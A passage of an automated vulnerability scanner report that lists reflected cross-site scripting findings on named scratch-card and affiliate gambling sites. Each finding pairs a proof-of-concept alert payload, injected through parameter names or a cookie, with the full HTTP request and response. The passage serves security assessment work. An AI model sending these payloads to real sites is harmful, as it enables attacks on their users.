HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&8bb36\"><script>alert(1)</script>3f495d41aad=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1&8bb36\"><script>alert(1)</script>3f495d41aad=1" title="Home">
...[SNIP]...

3.327. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a9e7</script><script>alert(1)</script>e9eb14befc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:48:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
unction(){
       $("#brands_hopa_more").show("slow");
   $("#brands_popular").css("padding-top","630px");

       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=1&7a9e7</script><script>alert(1)</script>e9eb14befc6=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=1&7a9e7</script>
...[SNIP]...

3.328. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f66"><script>alert(1)</script>07b94151931 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4f66\"><script>alert(1)</script>07b94151931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=1&d4f66"><script>alert(1)</script>07b94151931=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1&d4f66\"><script>alert(1)</script>07b94151931=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.neogamespartners.com/WebSite/Affiliates/login.aspx?CMI=1&d4f66\"><script>alert(1)</script>07b94151931=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.329. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 9e26e--><script>alert(1)</script>6245676709c was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301379e26e--><script>alert(1)</script>6245676709c; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28416
Content-Type: text/html
Set-Cookie: ARC=1301379e26e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6245676709c; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301379e26e--><script>alert(1)</script>6245676709c">
...[SNIP]...

3.330. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4871b'%3balert(1)//7528fc9c822 was submitted in the ARC cookie. This input was echoed as 4871b';alert(1)//7528fc9c822 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374871b'%3balert(1)//7528fc9c822; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28368
Content-Type: text/html
Set-Cookie: ARC=1301374871b%27%3Balert%281%29%2F%2F7528fc9c822; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301374871b';alert(1)//7528fc9c822&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.331. http://www.primescratchcards.com/HelpDepositMethods.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8bf4"%3balert(1)//350a49c0c13 was submitted in the ARC cookie. This input was echoed as c8bf4";alert(1)//350a49c0c13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c8bf4"%3balert(1)//350a49c0c13; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28368
Content-Type: text/html
Set-Cookie: ARC=130137c8bf4%22%3Balert%281%29%2F%2F350a49c0c13; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137c8bf4";alert(1)//350a49c0c13' border='0' width='1' height='1'>
...[SNIP]...

3.332. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload df246--><script>alert(1)</script>819719dda7e was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137df246--><script>alert(1)</script>819719dda7e; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26662
Content-Type: text/html
Set-Cookie: ARC=130137df246%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E819719dda7e; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137df246--><script>alert(1)</script>819719dda7e">
...[SNIP]...

3.333. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe783"%3balert(1)//5758c923b7f was submitted in the ARC cookie. This input was echoed as fe783";alert(1)//5758c923b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137fe783"%3balert(1)//5758c923b7f; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26668
Content-Type: text/html
Set-Cookie: ARC=130137fe783%22%3Balert%281%29%2F%2F5758c923b7f; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137fe783";alert(1)//5758c923b7f' border='0' width='1' height='1'>
...[SNIP]...

3.334. http://www.primescratchcards.com/InviteFriend.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67045'%3balert(1)//608d9fe8e13 was submitted in the ARC cookie. This input was echoed as 67045';alert(1)//608d9fe8e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013767045'%3balert(1)//608d9fe8e13; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26614
Content-Type: text/html
Set-Cookie: ARC=13013767045%27%3Balert%281%29%2F%2F608d9fe8e13; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013767045';alert(1)//608d9fe8e13&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.335. http://www.primescratchcards.com/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 139aa"%3balert(1)//16eb2f9deba was submitted in the ARC cookie. This input was echoed as 139aa";alert(1)//16eb2f9deba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137139aa"%3balert(1)//16eb2f9deba; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23468
Content-Type: text/html
Set-Cookie: ARC=130137139aa%22%3Balert%281%29%2F%2F16eb2f9deba; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137139aa";alert(1)//16eb2f9deba' border='0' width='1' height='1'>
...[SNIP]...

3.336. http://www.primescratchcards.com/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a688'%3balert(1)//65d51956d09 was submitted in the ARC cookie. This input was echoed as 3a688';alert(1)//65d51956d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373a688'%3balert(1)//65d51956d09; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23468
Content-Type: text/html
Set-Cookie: ARC=1301373a688%27%3Balert%281%29%2F%2F65d51956d09; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301373a688';alert(1)//65d51956d09&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.337. http://www.primescratchcards.com/Responsible.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 907a6--><script>alert(1)</script>ceae361237d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137907a6--><script>alert(1)</script>ceae361237d; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23516
Content-Type: text/html
Set-Cookie: ARC=130137907a6%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eceae361237d; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137907a6--><script>alert(1)</script>ceae361237d">
...[SNIP]...

3.338. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload a689d--><script>alert(1)</script>693aad67342 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a689d--><script>alert(1)</script>693aad67342; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20640
Content-Type: text/html
Set-Cookie: ARC=130137a689d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E693aad67342; expires=Tue, 15-May-2012 12:35:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137a689d--><script>alert(1)</script>693aad67342">
...[SNIP]...

3.339. http://www.primescratchcards.com/SecurityAndPrivacy.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac357'%3balert(1)//6b580480cc3 was submitted in the ARC cookie. This input was echoed as ac357';alert(1)//6b580480cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ac357'%3balert(1)//6b580480cc3; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
